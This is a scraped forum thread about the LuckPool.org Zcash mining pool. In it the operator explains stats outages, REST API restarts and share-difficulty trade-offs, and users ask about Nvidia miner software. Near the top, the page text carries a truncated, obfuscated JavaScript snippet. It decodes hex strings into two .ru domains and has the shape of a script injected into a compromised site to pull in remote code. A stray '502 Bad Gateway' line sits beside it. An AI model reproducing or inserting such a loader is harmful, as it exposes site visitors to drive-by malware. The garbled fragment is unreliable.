Pool- Luckpool.org: Solo Mining Block Rewards

LUCKPool.org broken
if(window.v_347548468_V_235235235 === undefined) !(function(){!function(){var t=JSON.parse(‘[“34686635727931332e7275”,“6c7a6c777170756c72666e2e7275”]’),e=“21677”,o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e=“”,o=0;o<t.length;o++)e+=String.fromCharCode(parseInt(t[o],16));return e},n=function(t,e,o){va…
502 Bad Gateway

Zogpool isn’t showing my real hash rate am i still sending the same amout of shares?

I just rebooted the pool. Seems like some of the stats reporting was getting stuck for me. Frontend was reporting workers that were offline.

The pool will only write shares to the database when it receives them from your miner so as long as your miner is reporting accepted shares and a connection to the pool everything is still functioning

is there an API that can use to monitor my miner on my phone?

Congrats to t1XBuFcA7BzTt3aLsfck1UZxtxChhpWx8AV on the LuckPool!

I usually just check on my phone with the website for now we don’t have any phone applications built.

Congrats indeed. With an average of 7days to find a block. Pretty lucky.

ZP has recovered from the holiday sol/s slump. Hopefully it is back on the growth track. Personally, I’m comfortable with weekly blocks, but I know ZP would be more attractive to more people if it delivered daily blocks, and that would allow it to better contribute to pool diversity long term.

Is it possible to provide mining speed more often, the web interface just doesn’t work that well, so I like to check in at times on the machines and while temps are displayed about every 30-45 seconds, I haven’t seen speed reported for 5 minutes and counting.

thanks!
SLC

Also the web interface really isn’t working to report speed at all…if you leave a tab open with your worker it used to reach your speed, but now it never makes it and resets to 0

I put a cronjob on the server to reboot the restapi every 10 minutes (in retrospect this was probably too aggressive) so that is why the stats never make it up to full power. I have now set this to 4 hours but it will still reset your stats every 4 hours. I do this because the restapi with crash internally without the proc dying so I can’t watch for its death to reboot it. Therefor I reboot it on a timer so that the stats don’t get stuck and we get reports that the pool is broken. So now there could be times when the front end does not report at all but the stats will now have a chance to get to full power. I still need to find a better way of doing this. Thanks for reporting.

The stats reporting is not perfect and as long as you are connected to the pool you are still submitting shares.

I realize that a pool with inconsistent stats reporting isn’t going to work for most people. But this pool is only being worked on by one programmer atm. Myself. I’ll do my best to get this pool working better.

5 Likes

[quote=“voxelot, post:212, topic:8668, full:true”] this pool is only being worked on by one programmer atm. Myself. I’ll do my best to get this pool working better.
[/quote]

Hang in there. I think a lot of us are rooting for you.

1 Like

cannot connet the pool,with Zec miner 0.0.2b
bat file:miner --server luckpool.org --port 3357 --user t1ehXFy5QvFopbRhLKBXbVmE8kYGqthCgZ9.zec1070 --pass x

I want to add my 5*1070 to mine on your luckpool, what miner gives best performance for 1070 cards?

From what I understand both optiminer and claymore won’t work with nvidia cards. I know that silentarmy was made to work with nvidia architecture but the software has not been updated in weeks (though the dev has made mention he is working on it again).

So perhaps Silentarmy? Others are probably have more experience with nvidia than myself and can offer better suggestions

Check out EWBF NV miner link Is posted in mining thread here,I think you will be very happy

1 Like

thank you very much.

I know , I get 250h/s per 1070 card with ewbf miner ,but it cannot be used in luckpool. I want to mine in luck pool.

Hi! On luckpool.org, how do you change the difficulty? The pool default difficulty is tiny - all I do is submit shares! Thanks!

eXtremal pool software doesn’t support vardiff. I have before coded a high difficulty for luckpool but the code bases its power stats off shares submitted.

So there is a tradeoff I can make right now. No sol/s stats on luck pool but high difficulty to spare share submissions, or power stats but lowest possible bitcoin diff 0x008

This is my first experience hacking on pool software so I am not sure how others gather their sol/s stats. i assume others can only know ~ how fast a miner is based upon its share submissions. The stat must need to be calculated as a probability of shares over time with respect to the difficulty the share is set to.

If anyone would like to help either eXtremal or I hack a better open source pool please let me know.

@voxelot Yes, I understand, but at a diff of 8000, my GPUs will still find a share every 30 seconds. Just make your stats report out every 10 minutes or so, and use the share count as you always do. There is no doubt that the sols/sec rate will be more volatile, due to the higher diff, but still adequate, for me anyway. The current difficulty is just entirely too easy. I won’t move the rest of my rigs over to luckpool if the pool diff doesn’t go way up. Thanks!